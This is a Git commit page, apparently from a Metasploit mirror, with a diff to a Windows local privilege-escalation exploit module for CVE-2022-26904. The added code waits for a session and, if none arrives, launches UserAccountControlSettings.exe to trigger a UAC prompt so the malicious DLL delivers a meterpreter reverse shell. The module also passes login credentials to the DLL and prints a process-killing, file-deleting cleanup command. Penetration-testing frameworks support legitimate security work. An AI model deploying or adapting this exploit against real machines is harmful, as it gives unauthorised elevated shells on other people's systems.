adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add in fix to ensure that we can spawn sessions automatically on Windows 10 20H2 and other systems were we hit a bug with UAC prompts from the exploit DLL itself not triggering the payload

Browse Source
This commit is contained in:
Grant Willcox
2022-04-05 19:16:48 -05:00
parent 597e173b0a
commit c8c91fcaf3
1 changed files with 16 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/windows/local/cve_2022_26904_superprofile.rb
+16 -1
View File
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Local
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'WfsDelay' => 30
'WfsDelay' => 300
},
'AKA' => [ 'SuperProfile' ]
}
@@ -232,6 +232,7 @@ class MetasploitModule < Msf::Exploit::Local
dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s
@session_obtained_bool = false
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation, and the credentials for the second user.
execute_dll(library_path, dll_info_parameter)
@@ -240,9 +241,23 @@ class MetasploitModule < Msf::Exploit::Local
print_warning("Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:")
print_warning('taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:\Users\TEMP || rmdir /q /s C:\Windows\System32\Narrator.exe.local')
print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')
print_status("Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.")
print_status("If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.")
sleep(60)
if (@session_obtained_bool == false)
# Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself
# triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.
begin
cmd_exec("UserAccountControlSettings.exe")
rescue Rex::TimeoutError
print_warning("Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!")
end
end
end
def on_new_session(new_session)
@session_obtained_bool = true
old_session = @session
@session = new_session
if new_session.type == 'meterpreter'